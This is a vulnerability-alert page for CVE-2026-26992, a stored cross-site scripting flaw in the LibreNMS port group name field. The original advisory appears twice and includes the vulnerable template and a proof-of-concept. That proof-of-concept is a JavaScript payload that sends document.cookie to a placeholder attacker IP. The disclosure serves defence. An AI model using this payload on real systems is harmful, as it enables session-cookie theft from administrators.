Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
5.1
LibreNMS Port Group Name Stored Cross-Site Scripting Risk
CVE-2026-26992
GHSA-93fx-g747-695x
Summary
LibreNMS has a security issue that allows attackers with admin privileges to inject malicious code into the system. This can happen when an attacker creates a port group with a specially crafted name. To fix this, LibreNMS needs to be updated to properly sanitize user input in the port group name.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| librenms | librenms | <= 26.2.0 | – |
Original title
LibreNMS /port-groups name Stored Cross-Site Scripting
Original description
### Summary
**/port-groups name Stored Cross-Site Scripting**
- HTTP POST
- Request-URI(s): "/port-groups"
- Vulnerable parameter(s): "name"
- Attacker must be authenticated with "admin" privileges.
- When a user adds a port group, an HTTP POST request is sent to the Request-URI "/port-groups". The name of the newly created port group is stored in the value of the name parameter.
- After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete.
### Details
The vulnerability exists as the name of the port group is not sanitized of HTML/JavaScript-related characters
or strings. When the delete button is rendered, the following template is used to render the page:
_resources/views/port-group/index.blade.php:_
```
@extends('layouts.librenmsv1')
@section('title', __('Port Groups'))
@section('content')
<div class="container-fluid">
<x-panel id="manage-port-groups-panel">
// [...Truncated...]
@foreach($port_groups as $port_group)
// [...Truncated...]
<button type="button" class="btn btn-danger btn-
sm" title="{{ __('delete Port Group') }}" aria-label="{{ __('Delete') }}"
onclick="delete_pg(this, '{{ $port_group-
>name }}', '{{ route('port-groups.destroy', $port_group->id) }}')"> // using the
port's name in the Delete button functionality without sanitizing for XSS related
characters/strings
```
As the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored
cross-site scripting.
### PoC
- Login
- Select Ports > Manage Port Groups
- Select New Port Group
- Input `12345');varpt=newImage();pt.src='http://<ATTACKER_IP>/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345 into the "Name" input box (change <ATTACKER_IP> to be an the IP of an attacker controlled webserver)`
- Select Save
- Select the Delete Icon for the newly created Port Group
- Select OK
- The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled server, leaking the user's cookies.
**/port-groups name Stored Cross-Site Scripting**
- HTTP POST
- Request-URI(s): "/port-groups"
- Vulnerable parameter(s): "name"
- Attacker must be authenticated with "admin" privileges.
- When a user adds a port group, an HTTP POST request is sent to the Request-URI "/port-groups". The name of the newly created port group is stored in the value of the name parameter.
- After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete.
### Details
The vulnerability exists as the name of the port group is not sanitized of HTML/JavaScript-related characters
or strings. When the delete button is rendered, the following template is used to render the page:
_resources/views/port-group/index.blade.php:_
```
@extends('layouts.librenmsv1')
@section('title', __('Port Groups'))
@section('content')
<div class="container-fluid">
<x-panel id="manage-port-groups-panel">
// [...Truncated...]
@foreach($port_groups as $port_group)
// [...Truncated...]
<button type="button" class="btn btn-danger btn-
sm" title="{{ __('delete Port Group') }}" aria-label="{{ __('Delete') }}"
onclick="delete_pg(this, '{{ $port_group-
>name }}', '{{ route('port-groups.destroy', $port_group->id) }}')"> // using the
port's name in the Delete button functionality without sanitizing for XSS related
characters/strings
```
As the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored
cross-site scripting.
### PoC
- Login
- Select Ports > Manage Port Groups
- Select New Port Group
- Input `12345');varpt=newImage();pt.src='http://<ATTACKER_IP>/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345 into the "Name" input box (change <ATTACKER_IP> to be an the IP of an attacker controlled webserver)`
- Select Save
- Select the Delete Icon for the newly created Port Group
- Select OK
- The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled server, leaking the user's cookies.
nvd CVSS3.1
4.8
nvd CVSS4.0
5.1
Vulnerability type
CWE-79
Cross-site Scripting (XSS)
- https://nvd.nist.gov/vuln/detail/CVE-2026-26992
- https://github.com/advisories/GHSA-93fx-g747-695x
- https://github.com/librenms/librenms/commit/882fe6f90ea504a3732f83caf89bba7850a5... Patch
- https://github.com/librenms/librenms/pull/19042 Issue Tracking
- https://github.com/librenms/librenms/releases/tag/26.2.0 Product Release Notes
- https://github.com/librenms/librenms/security/advisories/GHSA-93fx-g747-695x Exploit Third Party Advisory
Published: 18 Feb 2026 · Updated: 11 Mar 2026 · First seen: 6 Mar 2026